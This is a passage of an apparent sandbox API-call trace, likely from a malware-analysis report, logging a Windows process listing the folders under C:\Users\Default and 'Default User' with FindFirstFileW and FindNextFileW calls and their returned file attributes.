ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Music", cAlternateFileName="")) returned 1 [0071.117] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.117] lstrlenW (lpString="Music") returned 5 [0071.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.118] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.118] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.118] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.118] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.118] lstrlenW (lpString="desktop.ini") returned 11 [0071.118] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.118] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.118] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0071.118] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.118] lstrlenW (lpString="My Documents") returned 12 [0071.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1d88, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0071.118] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.118] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="NetHood", cAlternateFileName="")) returned 1 [0071.118] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.119] lstrlenW (lpString="NetHood") returned 7 [0071.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1d88, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0071.119] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.119] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0071.119] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.119] lstrlenW (lpString="NTUSER.DAT") returned 10 [0071.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.119] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.119] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.119] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.119] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.119] lstrlenW (lpString="desktop.ini") returned 11 [0071.119] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.120] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.120] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0071.120] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.120] lstrlenW (lpString="PrintHood") returned 9 [0071.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0071.120] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.120] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Recent", cAlternateFileName="")) returned 1 [0071.120] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.120] lstrlenW (lpString="Recent") returned 6 [0071.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0071.120] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.120] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0071.120] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.120] lstrlenW (lpString="Saved Games") returned 11 [0071.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.121] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.121] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.121] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.121] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.121] lstrlenW (lpString="desktop.ini") returned 11 [0071.121] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.121] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.121] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Searches", cAlternateFileName="")) returned 1 [0071.121] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.121] lstrlenW (lpString="Searches") returned 8 [0071.121] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.126] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.126] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.126] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.126] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.126] lstrlenW (lpString="desktop.ini") returned 11 [0071.126] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.127] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.127] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="SendTo", cAlternateFileName="")) returned 1 [0071.127] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.127] lstrlenW (lpString="SendTo") returned 6 [0071.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.127] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.127] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0071.127] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.127] lstrlenW (lpString="Start Menu") returned 10 [0071.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.127] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.127] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0071.127] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.127] lstrlenW (lpString="Templates") returned 9 [0071.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.127] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.127] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 1 [0071.127] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.127] lstrlenW (lpString="Videos") returned 6 [0071.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.128] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.128] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.128] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.128] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.128] lstrlenW (lpString="desktop.ini") returned 11 [0071.128] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.128] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.128] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 0 [0071.128] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0071.128] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0071.128] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0071.128] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.128] lstrlenW (lpString="Default User") returned 12 [0071.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x4f0070, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0071.129] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0071.129] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, 